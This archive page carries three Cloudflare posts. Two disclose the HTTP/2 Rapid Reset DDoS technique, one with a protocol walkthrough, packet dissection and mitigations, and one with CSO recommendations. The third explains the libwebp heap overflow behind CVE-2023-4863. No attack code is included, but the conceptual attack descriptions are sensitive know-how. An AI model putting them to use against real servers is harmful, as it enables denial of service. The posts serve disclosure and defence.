Tag Archives: vulnerabilities

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

Post Syndicated from Lucas Pardue original http://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

Starting on Aug 25, 2023, we started to notice some unusually big HTTP attacks hitting many of our customers. These attacks were detected and mitigated by our automated DDoS system. It was not long however, before they started to reach record breaking sizes — and eventually peaked just above 201 million requests per second. This was nearly 3x bigger than our previous biggest attack on record.

Concerning is the fact that the attacker was able to generate such an attack with a botnet of merely 20,000 machines. There are botnets today that are made up of hundreds of thousands or millions of machines. Given that the entire web typically sees only between 1–3 billion requests per second, it's not inconceivable that using this method could focus an entire web’s worth of requests on a small number of targets.

Detecting and Mitigating

This was a novel attack vector at an unprecedented scale, but Cloudflare's existing protections were largely able to absorb the brunt of the attacks. While initially we saw some impact to customer traffic — affecting roughly 1% of requests during the initial wave of attacks — today we’ve been able to refine our mitigation methods to stop the attack for any Cloudflare customer without it impacting our systems.

We noticed these attacks at the same time two other major industry players — Google and AWS — were seeing the same. We worked to harden Cloudflare’s systems to ensure that, today, all our customers are protected from this new DDoS attack method without any customer impact. We’ve also participated with Google and AWS in a coordinated disclosure of the attack to impacted vendors and critical infrastructure providers.

This attack was made possible by abusing some features of the HTTP/2 protocol and server implementation details (see  CVE-2023-44487 for details). Because the attack abuses an underlying weakness in the HTTP/2 protocol, we believe any vendor that has implemented HTTP/2 will be subject to the attack. This included every modern web server. We, along with Google and AWS, have disclosed the attack method to web server vendors who we expect will implement patches. In the meantime, the best defense is using a DDoS mitigation service like Cloudflare’s in front of any web-facing web or API server.

This post dives into the details of the HTTP/2 protocol, the feature that attackers exploited to generate these massive attacks, and the mitigation strategies we took to ensure all our customers are protected. Our hope is that by publishing these details other impacted web servers and services will have the information they need to implement mitigation strategies. And, moreover, the HTTP/2 protocol standards team, as well as teams working on future web standards, can better design them to prevent such attacks.

RST attack details

HTTP is the application protocol that powers the Web. HTTP Semantics are common to all versions of HTTP — the overall architecture, terminology, and protocol aspects such as request and response messages, methods, status codes, header and trailer fields, message content, and much more. Each individual HTTP version defines how semantics are transformed into a "wire format" for exchange over the Internet. For example, a client has to serialize a request message into binary data and send it, then the server parses that back into a message it can process.

HTTP/1.1 uses a textual form of serialization. Request and response messages are exchanged as a stream of ASCII characters, sent over a reliable transport layer like TCP, using the following format (where CRLF means carriage-return and linefeed):

 HTTP-message   = start-line CRLF
                   *( field-line CRLF )
                   CRLF
                   [ message-body ]

For example, a very simple GET request for https://blog.cloudflare.com/ would look like this on the wire:

GET / HTTP/1.1 CRLFHost: blog.cloudflare.comCRLF

And the response would look like:

HTTP/1.1 200 OK CRLFServer: cloudflareCRLFContent-Length: 100CRLFtext/html; charset=UTF-8CRLF<100 bytes of data>

This format frames messages on the wire, meaning that it is possible to use a single TCP connection to exchange multiple requests and responses. However, the format requires that each message is sent whole. Furthermore, in order to correctly correlate requests with responses, strict ordering is required; meaning that messages are exchanged serially and can not be multiplexed. Two GET requests, for https://blog.cloudflare.com/ and https://blog.cloudflare.com/page/2/, would be:

GET / HTTP/1.1 CRLFHost: blog.cloudflare.comCRLFGET /page/2 HTTP/1.1 CRLFHost: blog.cloudflare.comCRLF  

With the responses:

HTTP/1.1 200 OK CRLFServer: cloudflareCRLFContent-Length: 100CRLFtext/html; charset=UTF-8CRLF<100 bytes of data>HTTP/1.1 200 OK CRLFServer: cloudflareCRLFContent-Length: 100CRLFtext/html; charset=UTF-8CRLF<100 bytes of data>

Web pages require more complicated HTTP interactions than these examples. When visiting the Cloudflare blog, your browser will load multiple scripts, styles and media assets. If you visit the front page using HTTP/1.1 and decide quickly to navigate to page 2, your browser can pick from two options. Either wait for all of the queued up responses for the page that you no longer want before page 2 can even start, or cancel in-flight requests by closing the TCP connection and opening a new connection. Neither of these is very practical. Browsers tend to work around these limitations by managing a pool of TCP connections (up to 6 per host) and implementing complex request dispatch logic over the pool.

HTTP/2 addresses many of the issues with HTTP/1.1. Each HTTP message is serialized into a set of HTTP/2 frames that have type, length, flags, stream identifier (ID) and payload. The stream ID makes it clear which bytes on the wire apply to which message, allowing safe multiplexing and concurrency. Streams are bidirectional. Clients send frames and servers reply with frames using the same ID.

In HTTP/2 our GET request for https://blog.cloudflare.com would be exchanged across stream ID 1, with the client sending one HEADERS frame, and the server responding with one HEADERS frame, followed by one or more DATA frames. Client requests always use odd-numbered stream IDs, so subsequent requests would use stream ID 3, 5, and so on. Responses can be served in any order, and frames from different streams can be interleaved.

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

Stream multiplexing and concurrency are powerful features of HTTP/2. They enable more efficient usage of a single TCP connection. HTTP/2 optimizes resources fetching especially when coupled with prioritization. On the flip side, making it easy for clients to launch large amounts of parallel work can increase the peak demand for server resources when compared to HTTP/1.1. This is an obvious vector for denial-of-service.

In order to provide some guardrails, HTTP/2 provides a notion of maximum active concurrent streams. The SETTINGS_MAX_CONCURRENT_STREAMS parameter allows a server to advertise its limit of concurrency. For example, if the server states a limit of 100, then only 100 requests can be active at any time. If a client attempts to open a stream above this limit, it must be rejected by the server using a RST_STREAM frame. Stream rejection does not affect the other in-flight streams on the connection.

The true story is a little more complicated. Streams have a lifecycle. Below is a diagram of the HTTP/2 stream state machine. Client and server manage their own views of the state of a stream. HEADERS, DATA and RST_STREAM frames trigger transitions when they are sent or received. Although the views of the stream state are independent, they are synchronized.

HEADERS and DATA frames include an END_STREAM flag, that when set to the value 1 (true), can trigger a state transition.

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

Let's work through this with an example of a GET request that has no message content. The client sends the request as a HEADERS frame with the END_STREAM flag set to 1. The client first transitions the stream from idle to open state, then immediately transitions into half-closed state. The client half-closed state means that it can no longer send HEADERS or DATA, only WINDOW_UPDATE, PRIORITY or RST_STREAM frames. It can receive any frame however.

Once the server receives and parses the HEADERS frame, it transitions the stream state from idle to open and then half-closed, so it matches the client. The server half-closed state means it can send any frame but receive only WINDOW_UPDATE, PRIORITY or RST_STREAM frames.

The response to the GET contains message content, so the server sends HEADERS with END_STREAM flag set to 0, then DATA with END_STREAM flag set to 1. The DATA frame triggers the transition of the stream from half-closed to closed on the server. When the client receives it, it also transitions to closed. Once a stream is closed, no frames can be sent or received.

Applying this lifecycle back into the context of concurrency, HTTP/2 states:

Streams that are in the "open" state or in either of the "half-closed" states count toward the maximum number of streams that an endpoint is permitted to open. Streams in any of these three states count toward the limit advertised in the SETTINGS_MAX_CONCURRENT_STREAMS setting.

In theory, the concurrency limit is useful. However, there are practical factors that hamper its effectiveness— which we will cover later in the blog.

HTTP/2 request cancellation

Earlier, we talked about client cancellation of in-flight requests. HTTP/2 supports this in a much more efficient way than HTTP/1.1. Rather than needing to tear down the whole connection, a client can send a RST_STREAM frame for a single stream. This instructs the server to stop processing the request and to abort the response, which frees up server resources and avoids wasting bandwidth.

Let's consider our previous example of 3 requests. This time the client cancels the request on stream 1 after all of the HEADERS have been sent. The server parses this RST_STREAM frame before it is ready to serve the response and instead only responds to stream 3 and 5:

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

Request cancellation is a useful feature. For example, when scrolling a webpage with multiple images, a web browser can cancel images that fall outside the viewport, meaning that images entering it can load faster. HTTP/2 makes this behaviour a lot more efficient compared to HTTP/1.1.

A request stream that is canceled, rapidly transitions through the stream lifecycle. The client's HEADERS with END_STREAM flag set to 1 transitions the state from idle to open to half-closed, then RST_STREAM immediately causes a transition from half-closed to closed.

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

Recall that only streams that are in the open or half-closed state contribute to the stream concurrency limit. When a client cancels a stream, it instantly gets the ability to open another stream in its place and can send another request immediately. This is the crux of what makes CVE-2023-44487 work.

Rapid resets leading to denial of service

HTTP/2 request cancellation can be abused to rapidly reset an unbounded number of streams. When an HTTP/2 server is able to process client-sent RST_STREAM frames and tear down state quickly enough, such rapid resets do not cause a problem. Where issues start to crop up is when there is any kind of delay or lag in tidying up. The client can churn through so many requests that a backlog of work accumulates, resulting in excess consumption of resources on the server.

A common HTTP deployment architecture is to run an HTTP/2 proxy or load-balancer in front of other components. When a client request arrives it is quickly dispatched and the actual work is done as an asynchronous activity somewhere else. This allows the proxy to handle client traffic very efficiently. However, this separation of concerns can make it hard for the proxy to tidy up the in-process jobs. Therefore, these deployments are more likely to encounter issues from rapid resets.

When Cloudflare's reverse proxies process incoming HTTP/2 client traffic, they copy the data from the connection’s socket into a buffer and process that buffered data in order. As each request is read (HEADERS and DATA frames) it is dispatched to an upstream service. When RST_STREAM frames are read, the local state for the request is torn down and the upstream is notified that the request has been canceled. Rinse and repeat until the entire buffer is consumed. However this logic can be abused: when a malicious client started sending an enormous chain of requests and resets at the start of a connection, our servers would eagerly read them all and create stress on the upstream servers to the point of being unable to process any new incoming request.

Something that is important to highlight is that stream concurrency on its own cannot mitigate rapid reset. The client can churn requests to create high request rates no matter the server's chosen value of SETTINGS_MAX_CONCURRENT_STREAMS.

Rapid Reset dissected

Here's an example of rapid reset reproduced using a proof-of-concept client attempting to make a total of 1000 requests. I've used an off-the-shelf server without any mitigations; listening on port 443 in a test environment. The traffic is dissected using Wireshark and filtered to show only HTTP/2 traffic for clarity. Download the pcap to follow along.

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

It's a bit difficult to see, because there are a lot of frames. We can get a quick summary via Wireshark's Statistics > HTTP2 tool:

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

The first frame in this trace, in packet 14, is the server's SETTINGS frame, which advertises a maximum stream concurrency of 100. In packet 15, the client sends a few control frames and then starts making requests that are rapidly reset. The first HEADERS frame is 26 bytes long, all subsequent HEADERS are only 9 bytes. This size difference is due to a compression technology called HPACK. In total, packet 15 contains 525 requests, going up to stream 1051.

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

Interestingly, the RST_STREAM for stream 1051 doesn't fit in packet 15, so in packet 16 we see the server respond with a 404 response.  Then in packet 17 the client does send the RST_STREAM, before moving on to sending the remaining 475 requests.

Note that although the server advertised 100 concurrent streams, both packets sent by the client sent a lot more HEADERS frames than that. The client did not have to wait for any return traffic from the server, it was only limited by the size of the packets it could send. No server RST_STREAM frames are seen in this trace, indicating that the server did not observe a concurrent stream violation.

Impact on customers

As mentioned above, as requests are canceled, upstream services are notified and can abort requests before wasting too many resources on it. This was the case with this attack, where most malicious requests were never forwarded to the origin servers. However, the sheer size of these attacks did cause some impact.

First, as the rate of incoming requests reached peaks never seen before, we had reports of increased levels of 502 errors seen by clients. This happened on our most impacted data centers as they were struggling to process all the requests. While our network is meant to deal with large attacks, this particular vulnerability exposed a weakness in our infrastructure. Let's dig a little deeper into the details, focusing on how incoming requests are handled when they hit one of our data centers:

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

We can see that our infrastructure is composed of a chain of different proxy servers with different responsibilities. In particular, when a client connects to Cloudflare to send HTTPS traffic, it first hits our TLS decryption proxy: it decrypts TLS traffic, processes HTTP 1, 2 or 3 traffic, then forwards it to our "business logic" proxy. This one is responsible for loading all the settings for each customer, then routing the requests correctly to other upstream services — and more importantly in our case, it is also responsible for security features. This is where L7 attack mitigation is processed.

The problem with this attack vector is that it manages to send a lot of requests very quickly in every single connection. Each of them had to be forwarded to the business logic proxy before we had a chance to block it. As the request throughput became higher than our proxy capacity, the pipe connecting these two services reached its saturation level in some of our servers.

When this happens, the TLS proxy cannot connect anymore to its upstream proxy, this is why some clients saw a bare "502 Bad Gateway" error during the most serious attacks. It is important to note that, as of today, the logs used to create HTTP analytics are also emitted by our business logic proxy. The consequence of that is that these errors are not visible in the Cloudflare dashboard. Our internal dashboards show that about 1% of requests were impacted during the initial wave of attacks (before we implemented mitigations), with peaks at around 12% for a few seconds during the most serious one on August 29th. The following graph shows the ratio of these errors over a two hours while this was happening:

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

We worked to reduce this number dramatically in the following days, as detailed later on in this post. Both thanks to changes in our stack and to our mitigation that reduce the size of these attacks considerably, this number is today is effectively zero:

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

499 errors and the challenges for HTTP/2 stream concurrency

Another symptom reported by some customers is an increase in 499 errors. The reason for this is a bit different and is related to the maximum stream concurrency in a HTTP/2 connection detailed earlier in this post.

HTTP/2 settings are exchanged at the start of a connection using SETTINGS frames. In the absence of receiving an explicit parameter, default values apply. Once a client establishes an HTTP/2 connection, it can wait for a server's SETTINGS (slow) or it can assume the default values and start making requests (fast). For SETTINGS_MAX_CONCURRENT_STREAMS, the default is effectively unlimited (stream IDs use a 31-bit number space, and requests use odd numbers, so the actual limit is 1073741824). The specification recommends that a server offer no fewer than 100 streams. Clients are generally biased towards speed, so don't tend to wait for server settings, which creates a bit of a race condition. Clients are taking a gamble on what limit the server might pick; if they pick wrong the request will be rejected and will have to be retried. Gambling on 1073741824 streams is a bit silly. Instead, a lot of clients decide to limit themselves to issuing 100 concurrent streams, with the hope that servers followed the specification recommendation. Where servers pick something below 100, this client gamble fails and streams are reset.

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

There are many reasons a server might reset a stream beyond concurrency limit overstepping. HTTP/2 is strict and requires a stream to be closed when there are parsing or logic errors. In 2019, Cloudflare developed several mitigations in response to HTTP/2 DoS vulnerabilities. Several of those vulnerabilities were caused by a client misbehaving, leading the server to reset a stream. A very effective strategy to clamp down on such clients is to count the number of server resets during a connection, and when that exceeds some threshold value, close the connection with a GOAWAY frame. Legitimate clients might make one or two mistakes in a connection and that is acceptable. A client that makes too many mistakes is probably either broken or malicious and closing the connection addresses both cases.

While responding to DoS attacks enabled by CVE-2023-44487, Cloudflare reduced maximum stream concurrency to 64. Before making this change, we were unaware that clients don't wait for SETTINGS and instead assume a concurrency of 100. Some web pages, such as an image gallery, do indeed cause a browser to send 100 requests immediately at the start of a connection. Unfortunately, the 36 streams above our limit all needed to be reset, which triggered our counting mitigations. This meant that we closed connections on legitimate clients, leading to a complete page load failure. As soon as we realized this interoperability issue, we changed the maximum stream concurrency to 100.

Actions from the Cloudflare side

In 2019 several DoS vulnerabilities were uncovered related to implementations of HTTP/2. Cloudflare developed and deployed a series of detections and mitigations in response.  CVE-2023-44487 is a different manifestation of HTTP/2 vulnerability. However, to mitigate it we were able to extend the existing protections to monitor client-sent RST_STREAM frames and close connections when they are being used for abuse. Legitimate client uses for RST_STREAM are unaffected.

In addition to a direct fix, we have implemented several improvements to the server's HTTP/2 frame processing and request dispatch code. Furthermore, the business logic server has received improvements to queuing and scheduling that reduce unnecessary work and improve cancellation responsiveness. Together these lessen the impact of various potential abuse patterns as well as giving more room to the server to process requests before saturating.

Mitigate attacks earlier

Cloudflare already had systems in place to efficiently mitigate very large attacks with less expensive methods. One of them is named "IP Jail". For hyper volumetric attacks, this system collects the client IPs participating in the attack and stops them from connecting to the attacked property, either at the IP level, or in our TLS proxy. This system however needs a few seconds to be fully effective; during these precious seconds, the origins are already protected but our infrastructure still needs to absorb all HTTP requests. As this new botnet has effectively no ramp-up period, we need to be able to neutralize attacks before they can become a problem.

To achieve this we expanded the IP Jail system to protect our entire infrastructure: once an IP is "jailed", not only it is blocked from connecting to the attacked property, we also forbid the corresponding IPs from using HTTP/2 to any other domain on Cloudflare for some time. As such protocol abuses are not possible using HTTP/1.x, this limits the attacker's ability to run large attacks, while any legitimate client sharing the same IP would only see a very small performance decrease during that time. IP based mitigations are a very blunt tool — this is why we have to be extremely careful when using them at that scale and seek to avoid false positives as much as possible. Moreover, the lifespan of a given IP in a botnet is usually short so any long term mitigation is likely to do more harm than good. The following graph shows the churn of IPs in the attacks we witnessed:

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

As we can see, many new IPs spotted on a given day disappear very quickly afterwards.

As all these actions happen in our TLS proxy at the beginning of our HTTPS pipeline, this saves considerable resources compared to our regular L7 mitigation system. This allowed us to weather these attacks much more smoothly and now the number of random 502 errors caused by these botnets is down to zero.

Observability improvements

Another front on which we are making change is observability. Returning errors to clients without being visible in customer analytics is unsatisfactory. Fortunately, a project has been underway to overhaul these systems since long before the recent attacks. It will eventually allow each service within our infrastructure to log its own data, instead of relying on our business logic proxy to consolidate and emit log data. This incident underscored the importance of this work, and we are redoubling our efforts.

We are also working on better connection-level logging, allowing us to spot such protocol abuses much more quickly to improve our DDoS mitigation capabilities.

Conclusion

While this was the latest record-breaking attack, we know it won’t be the last. As attacks continue to become more sophisticated, Cloudflare works relentlessly to proactively identify new threats — deploying countermeasures to our global network so that our millions of customers are immediately and automatically protected.

Cloudflare has provided free, unmetered and unlimited DDoS protection to all of our customers since 2017. In addition, we offer a range of additional security features to suit the needs of organizations of all sizes. Contact us if you’re unsure whether you’re protected or want to understand how you can be.

HTTP/2 Zero-Day Vulnerability Results in Record-Breaking DDoS Attacks

Post Syndicated from Grant Bourzikas original http://blog.cloudflare.com/zero-day-rapid-reset-http2-record-breaking-ddos-attack/

HTTP/2 Zero-Day Vulnerability Results in Record-Breaking DDoS Attacks

HTTP/2 Zero-Day Vulnerability Results in Record-Breaking DDoS Attacks

Earlier today, Cloudflare, along with Google and Amazon AWS, disclosed the existence of a novel zero-day vulnerability dubbed the “HTTP/2 Rapid Reset” attack. This attack exploits a weakness in the HTTP/2 protocol to generate enormous, hyper-volumetric Distributed Denial of Service (DDoS) attacks. Cloudflare has mitigated a barrage of these attacks in recent months, including an attack three times larger than any previous attack we’ve observed, which exceeded 201 million requests per second (rps). Since the end of August 2023, Cloudflare has mitigated more than 1,100 other attacks with over 10 million rps — and 184 attacks that were greater than our previous DDoS record of 71 million rps.

This zero-day provided threat actors with a critical new tool in their Swiss Army knife of vulnerabilities to exploit and attack their victims at a magnitude that has never been seen before. While at times complex and challenging to combat, these attacks allowed Cloudflare the opportunity to develop purpose-built technology to mitigate the effects of the zero-day vulnerability.

If you are using Cloudflare for HTTP DDoS mitigation, you are protected. And below, we’ve included more information on this vulnerability, and resources and recommendations on what you can do to secure yourselves.

Deconstructing the attack: What every CSO needs to know

In late August 2023, our team at Cloudflare noticed a new zero-day vulnerability, developed by an unknown threat actor, that exploits the standard HTTP/2 protocol — a fundamental protocol that is critical to how the Internet and all websites work. This novel zero-day vulnerability attack, dubbed Rapid Reset, leverages HTTP/2’s stream cancellation feature by sending a request and immediately canceling it over and over.  

By automating this trivial “request, cancel, request, cancel” pattern at scale, threat actors are able to create a denial of service and take down any server or application running the standard implementation of HTTP/2. Furthermore, one crucial thing to note about the record-breaking attack is that it involved a modestly-sized botnet, consisting of roughly 20,000 machines. Cloudflare regularly detects botnets that are orders of magnitude larger than this — comprising hundreds of thousands and even millions of machines. For a relatively small botnet to output such a large volume of requests, with the potential to incapacitate nearly any server or application supporting HTTP/2, underscores how menacing this vulnerability is for unprotected networks.

Threat actors used botnets in tandem with the HTTP/2 vulnerability to amplify requests at rates we have never seen before. As a result, our team at Cloudflare experienced some intermittent edge instability. While our systems were able to mitigate the overwhelming majority of incoming attacks, the volume overloaded some components in our network, impacting a small number of customers’ performance with intermittent 4xx and 5xx errors — all of which were quickly resolved.

Once we successfully mitigated these issues and halted potential attacks for all customers, our team immediately kicked off a responsible disclosure process. We entered into conversations with industry peers to see how we could work together to help move our mission forward and safeguard the large percentage of the Internet that relies on our network prior to releasing this vulnerability to the general public.

We cover the technical details of the attack in more detail in a separate blog post: HTTP/2 Rapid Reset: deconstructing the record-breaking attack.

How is Cloudflare and the industry thwarting this attack?

There is no such thing as a “perfect disclosure.” Thwarting attacks and responding to emerging incidents requires organizations and security teams to live by an assume-breach mindset — because there will always be another zero-day, new evolving threat actor groups, and never-before-seen novel attacks and techniques.

This “assume-breach” mindset is a key foundation towards information sharing and ensuring in instances such as this that the Internet remains safe. While Cloudflare was experiencing and mitigating these attacks, we were also working with industry partners to guarantee that the industry at-large could withstand this attack.  

During the process of mitigating this attack, our Cloudflare team developed and purpose-built new technology to stop these DDoS attacks and further improve our own mitigations for this and other future attacks of massive scale. These efforts have significantly increased our overall mitigation capabilities and resiliency. If you are using Cloudflare, we are confident that you are protected.

Our team also alerted web server software partners who are developing patches to ensure this vulnerability cannot be exploited — check their websites for more information.

HTTP/2 Zero-Day Vulnerability Results in Record-Breaking DDoS Attacks

Disclosures are never one and done. The lifeblood of Cloudflare is to ensure a better Internet, which stems from instances such as these. When we have the opportunity to work with our industry partners and governments to ensure there are no widespread impacts on the Internet, we are doing our part in increasing the cyber resiliency of every organization no matter the size or vertical.

To gain more of an understanding around mitigation tactics and next steps on patching, register for our webinar.

What are the origins of the HTTP/2 Rapid Reset and these record-breaking attacks on Cloudflare?

It may seem odd that Cloudflare was one of the first companies to witness these attacks. Why would threat actors attack a company that has some of the most robust defenses against DDoS attacks in the world?  

The reality is that Cloudflare often sees attacks before they are turned on more vulnerable targets. Threat actors need to develop and test their tools before they deploy them in the wild. Threat actors who possess record-shattering attack methods can have an extremely difficult time testing and understanding how large and effective they are, because they don't have the infrastructure to absorb the attacks they are launching. Because of the transparency that we share on our network performance, and the measurements of attacks they could glean from our public performance charts, this threat actor was likely targeting us to understand the capabilities of the exploit.

But that testing, and the ability to see the attack early, helps us develop mitigations for the attack that benefit both our customers and industry as a whole.

From CSO to CSO: What should you do?

I have been a CSO for over 20 years, on the receiving end of countless disclosures and  announcements like this. But whether it was Log4J, Solarwinds, EternalBlue WannaCry/NotPetya, Heartbleed, or Shellshock, all of these security incidents have a commonality. A tremendous explosion that ripples across the world and creates an opportunity to completely disrupt any of the organizations that I have led — regardless of the industry or the size.

Many of these were attacks or vulnerabilities that we may have not been able to control. But regardless of whether the issue arose from something that was in my control or not, what has set any successful initiative I have led apart from those that did not lean in our favor was the ability to respond when zero-day vulnerabilities and exploits like this are identified.    

While I wish I could say that Rapid Reset may be different this time around, it is not. I am calling all CSOs — no matter if you’ve lived through the decades of security incidents that I have, or this is your first day on the job — this is the time to ensure you are protected and stand up your cyber incident response team.

We’ve kept the information restricted until today to give as many security vendors as possible the opportunity to react. However, at some point, the responsible thing becomes to publicly disclose zero-day threats like this. Today is that day. That means that after today, threat actors will be largely aware of the HTTP/2 vulnerability; and it will inevitably become trivial to exploit and kickoff the race between defenders and attacks — first to patch vs. first to exploit. Organizations should assume that systems will be tested, and take proactive measures to ensure protection.

To me, this is reminiscent of a vulnerability like Log4J, due to the many variants that are emerging daily, and will continue to come to fruition in the weeks, months, and years to come. As more researchers and threat actors experiment with the vulnerability, we may find different variants with even shorter exploit cycles that contain even more advanced bypasses.  

And just like Log4J, managing incidents like this isn’t as simple as “run the patch, now you’re done”. You need to turn incident management, patching, and evolving your security protections into ongoing processes — because the patches for each variant of a vulnerability reduce your risk, but they don’t eliminate it.

I don’t mean to be alarmist, but I will be direct: you must take this seriously. Treat this as a full active incident to ensure nothing happens to your organization.

Recommendations for a New Standard of Change

While no one security event is ever identical to the next, there are lessons that can be learned. CSOs, here are my recommendations that must be implemented immediately. Not only in this instance, but for years to come:

  • Understand your external and partner network’s external connectivity to remediate any Internet facing systems with the mitigations below.
  • Understand your existing security protection and capabilities you have to protect, detect and respond to an attack and immediately remediate any issues you have in your network.
  • Ensure your DDoS Protection resides outside of your data center because if the traffic gets to your datacenter, it will be difficult to mitigate the DDoS attack.
  • Ensure you have DDoS protection for Applications (Layer 7) and ensure you have Web Application Firewalls. Additionally as a best practice, ensure you have complete DDoS protection for DNS, Network Traffic (Layer 3) and API Firewalls
  • Ensure web server and operating system patches are deployed across all Internet Facing Web Servers. Also, ensure all automation like Terraform builds and images are fully patched so older versions of web servers are not deployed into production over the secure images by accident.
  • As a last resort, consider turning off HTTP/2 and HTTP/3 (likely also vulnerable) to mitigate the threat.  This is a last resort only, because there will be a significant performance issues if you downgrade to HTTP/1.1
  • Consider a secondary, cloud-based DDoS L7 provider at perimeter for resilience.

Cloudflare’s mission is to help build a better Internet. If you are concerned with your current state of DDoS protection, we are more than happy to provide you with our DDoS capabilities and resilience for free to mitigate any attempts of a successful DDoS attack.  We know the stress that you are facing as we have fought off these attacks for the last 30 days and made our already best in class systems, even better.

If you’re interested in finding out more, we have a webinar coming up with more details on the zero-day and how to respond; you can register here. We also have more technical details of the attack in more detail in a separate blog post: HTTP/2 Rapid Reset: deconstructing the record-breaking attack. Finally, if you’re being targeted or need immediate protection, please contact your local Cloudflare representative or visit https://www.cloudflare.com/under-attack-hotline/.

Uncovering the Hidden WebP vulnerability: a tale of a CVE with much bigger implications than it originally seemed

Post Syndicated from Willi Geiger original http://blog.cloudflare.com/uncovering-the-hidden-webp-vulnerability-cve-2023-4863/

Uncovering the Hidden WebP vulnerability: a tale of a CVE with much bigger implications than it originally seemed

Uncovering the Hidden WebP vulnerability: a tale of a CVE with much bigger implications than it originally seemed

At Cloudflare, we're constantly vigilant when it comes to identifying vulnerabilities that could potentially affect the Internet ecosystem. Recently, on September 12, 2023, Google announced a security issue in Google Chrome, titled "Heap buffer overflow in WebP in Google Chrome," which caught our attention. Initially, it seemed like just another bug in the popular web browser. However, what we discovered was far more significant and had implications that extended well beyond Chrome.

Impact much wider than suggested

The vulnerability, tracked under CVE-2023-4863, was described as a heap buffer overflow in WebP within Google Chrome. While this description might lead one to believe that it's a problem confined solely to Chrome, the reality was quite different. It turned out to be a bug deeply rooted in the libwebp library, which is not only used by Chrome but by virtually every application that handles WebP images.

Digging deeper, this vulnerability was in fact first reported in an earlier CVE from Apple, CVE-2023-41064, although the connection was not immediately obvious. In early September, Citizen Lab, a research lab based out of the University of Toronto, reported on an apparent exploit that was being used to attempt to install spyware on the iPhone of "an individual employed by a Washington DC-based civil society organization." The advisory from Apple was also incomplete, stating that it was a “buffer overflow issue in ImageIO,” and that they were aware the issue may have been actively exploited. Only after Google released CVE-2023-4863 did it become clear that these two issues were linked, and there was a wider vulnerability in WebP.

The vulnerability allows an attacker to create a malformed WebP image file that makes libwebp write data beyond the buffer memory allocated to the image decoder. By writing past the legal bounds of the buffer, it is possible to modify sensitive data in memory, eventually leading to execution of the attacker's code.

WebP, introduced over a decade ago, has gained widespread adoption in various applications, ranging from web browsers to email clients, chat apps, graphics programs, and even operating systems. This ubiquity meant that this vulnerability had far-reaching consequences, affecting a vast array of software and virtually all users of the WebP format.

Uncovering the Hidden WebP vulnerability: a tale of a CVE with much bigger implications than it originally seemed
How the WebP vulnerability is exploited

Understanding the technical details

So what exactly was the issue, how could it be exploited, and how was it shut down? We can get our best clues by looking at the patch that was made to libwebp. This patch fixes a potential out-of-buffer (OOB) error in part of the image decoder – the Huffman tables – with two changes: additional validation of the input data, and a modified dynamic memory allocation model. A deeper dive into libwebp and the WebP image format built on top of it reveals what this means.

WebP is a combination of two different image formats: a lossy format similar to JPEG using VP8 codec, and a lossless format using WebP's custom lossless codec. The bug was in the lossless codec's handling of Huffman coding.

The fundamental idea behind Huffman coding is that using a constant number of bits for every basic unit of information in a dataset – like a pixel color – is not the most efficient representation. We can use a variable number of bits, and assign shortest sequences to the most frequently occurring values, and longer ones to the least common values. The sequences of ones and zeros can be represented as a binary tree, with the shorter, more common codes near the root, and longer, less common codes deeper in the tree. Looking up values in the tree bit by bit is relatively slow. Practical implementations build lookup tables that allow matching many bits at a time.

Image files contain compact information about the shape of the Huffman tree, which the decoder uses to reconstruct the tree, and build lookup tables for the codes. The bug in libwebp was in the code building the lookup tables. A specially crafted WebP file can contain a very unbalanced Huffman tree that contains codes much longer than any normal WebP file would have, and this made the function generating lookup tables write data beyond the buffer allocated for the lookup tables. Libwebp had checks for validity of the Huffman tree, but it would write the invalid lookup tables before the consistency check.

The buffer for lookup tables is allocated on the heap. Heap is an area of memory where most of the data of the application is stored. Code that writes data past its buffer allows attackers to modify and corrupt data that happens to be adjacent in memory to the buffer. This can be exploited to make the application misbehave, and eventually start executing code supplied by the attacker.

The fixed version of libwebp ensures that the input data will always create a valid internal structure, and if so, allocates more memory if necessary to ensure the buffer is always big enough.

Libwebp is a mature library, maintained by seasoned professionals. But it's written in the C language, which has very few safeguards against programming errors, especially memory use. Despite the care taken in the library's development, a single erroneous assumption led to a critical vulnerability.

Swift action

On the same day that Google's announcement caught our attention, we filed an internal security ticket, to document and address the vulnerability.

Google was initially perplexed about the true source of the problem. They did not release a patched version of libwebp before announcing the vulnerability. We discovered the yet-unreleased patch for libwebp in its repository, and used it to update libwebp in our services. libwebp officially released the patch a day later.

Our image processing services are written in Rust. We've submitted patches to Rust packages that contained a copy of libwebp and filed RustSec advisories for them (RUSTSEC-2023-0061 and RUSTSEC-2023-0062). This ensured that the broader Rust ecosystem was informed and could take appropriate action.

In an interesting turn of events, GitHub's vulnerability scanner was quick to recognize our RustSec reports as the first case of CVE-2023-4863, even before the issue gained widespread attention. This highlights the importance of having robust security reporting mechanisms in place and the vital role that platforms like GitHub play in keeping the open-source community secure.

These quick actions demonstrate how seriously Cloudflare takes this kind of threat. We have a belt-and-suspenders approach to security that limits the binaries we run at our edge to those signed by us, and ensures that all vulnerabilities are identified and remedied as soon as possible. In this case, we have scrutinized our logs, and found no evidence that any attackers attempted to leverage this vulnerability against Cloudflare. We believe this exploit targeted individuals rather than the infrastructure of a company like Cloudflare, but we never take chances with our customers’ data, and so fixed this vulnerability as quickly as possible, before it became well known.

Conclusion

Google has now widened its description of this issue, correctly calling out that all uses of WebP are potentially affected. This widened description was originally filed as yet another new CVE – CVE-2023-5129 – but then that was flagged as a duplicate of the original CVE-2023-4863, and the description of the earlier filing updated. This incident serves as a reminder of the complex and interconnected nature of the internet ecosystem. What initially seemed like a Chrome-specific problem revealed a much deeper issue that touched nearly every corner of the digital world. The incident also showcased the importance of swift collaboration and the critical role that responsible disclosure plays in mitigating security risks.

